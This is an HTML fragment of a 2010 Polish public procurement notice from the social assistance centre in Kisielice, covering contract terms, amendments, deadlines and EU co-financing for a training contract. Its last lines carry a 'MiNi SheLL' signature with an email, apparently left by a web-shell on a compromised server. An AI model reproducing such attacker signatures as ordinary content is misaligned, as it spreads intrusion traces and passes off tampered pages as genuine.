<p>1. Zamawiający ustala ogólny wzór umowy na realizacje zamówienia. Do SIWZ należy złozyć pisemne oświadczenia o przyjęciu warunków umowy-zaakceptować wzórumowy we wskazanym miejscu. 2.W szczególnie uzasadnionych przypadkach Zamawiający przewiduje mozliwość wprowadzenia zmian w umowie przez sporządzenie aneksu do umowy dotyczacych:-zmniejszenia lub zwiekszenia liczby osób, ilości godzin i kosztu szkolenia.3.Podpisanie umowy nastąpi zgodnie z art.94 ustawy Pzp.$. Przed podpisaniem umowy Zawmawiajacy zastrzega sobie prawo kontroli pomieszczeń oraz sprzętu przewidzianego do realizacji szkolenia. Niezgodność wskazanych w ofercie pomieszczeń  i sprzetu skutkuje nie podpisaniem umowy i wyborem innej jednostki szkolącej-kolejnej z najwyższą liczba punktów. 5. Zakres świadczenia Wykonawcy wynikajacy z podpisanej umowy musi być tożsamy z jego zobowiązaniem zawartym w ofercie. 6. W umowie zostana okreslone strony i przedmiot zamówienia oraz termin realizacji uymowy z uwzglednieniem liczby osób uczestniczacych w szkoleniach . 7. Umowa bedzie zawierała okresloenie kosztu szkolenia i sposobu zapłaty na realizacje zamówienia. 8. Umowa w sprawie zamówienia publicznego bedzie nieważna w części wykraczajacej poza przedmiot zamówienia okreslony w SIWZ. 9. W szczególnie uzasadnionych przypadkach dopuszcza sie zmiana sposobu spełnienia świadczenia przed zawarciem umowy na skutek okolicznosci, których nie można było przewidzeć w chwili wyboru najkorzystniejszej oferty lub zmiany te są korzystne dla Zamawiającego, a Wykonawca wyrazi na nią zgodę. Zmiany sposobu spełnienia świadczenia nie mogą dotyczyć zobowiązań Wykonawcy zawartych w ofercie, które były ocenione w toku spostepowania 10.W razie wystapąpienia istotnej zmiany okoliczności powodującej ,że wykonanie umowy nie leży w interesie publicznym , czego nie można było przewidzieć w zawarcia umowy, Zamawiający może odstapić od umowy w terminie 30 dni od powziecia wiadomości o powyższych okolicznościach. W takim przypadku Wykonawca może żądać jedynie wynagrodzenia należnego mu z tytułu wykonania części umowy (art.145 P.zp.)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kisielice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej w Kisielicach 14-220 Kisielice ul.Sienkiewicza 18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.05.2010 godzina 08:00, miejsce: Miejsko-Gminny Ośrodek Pomocy Społecznej w Kisielicach ul.Sienkiewicza 18 pokój-sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> realizacja projektu systemowego realizawanego w ramach Programu Operacyjnego Kapitał  Ludzki 2007-2013.Prirytet VII, Działanie 7.1, Poddziałanie 7.1.1 wspófinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego TWOJA SZANSA.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com